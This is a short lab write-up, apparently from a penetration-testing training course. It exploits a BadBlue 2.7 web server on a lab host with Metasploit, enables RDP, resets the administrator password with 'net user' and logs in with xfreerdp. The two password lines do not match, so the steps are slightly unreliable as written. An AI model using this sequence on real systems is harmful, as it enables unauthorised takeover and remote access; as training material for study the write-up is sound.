Windows: Enabling Remote Desktop
Lab Environment
In this lab environment, you will be provided with GUI access to a Kali machine. The target machine running a vulnerable application will be accessible at demo.ine.local.
Your task is to fingerprint the vulnerable application using the tools available on the Kali machine and then exploit the vulnerability using the Metasploit framework. Then, enable the target machine RDP service and access it using xfreerdp tool.
Objective: Your task is to find and exploit the vulnerable application and get the RDP session to find the flag!
Note: rdesktop will not work on this setup as it does not support NLA. Please use xfreerdp to connect to the RDP server.
Tools
The best tools for this lab are:
Nmap
Metasploit Framework
xfreerdp
Writeup
nmap -sSVC demo.ine.local
PORT STATE SERVICE VERSION
80/tcp open http BadBlue httpd 2.7
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-06-10T18:08:35
|_ start_date: 2025-06-10T18:06:00
msfconsole
use exploit/windows/http/badblue_passthru
set RHOSTS demo.ine.local
exploit
background
use post/windows/manage/enable_rdp
set session 1
run
sessions -i 1
shell
net user administrator cibaism_o5
xfreerdp /u:administrator /p:cibaism_05 /v:demo.ine.local
Last updated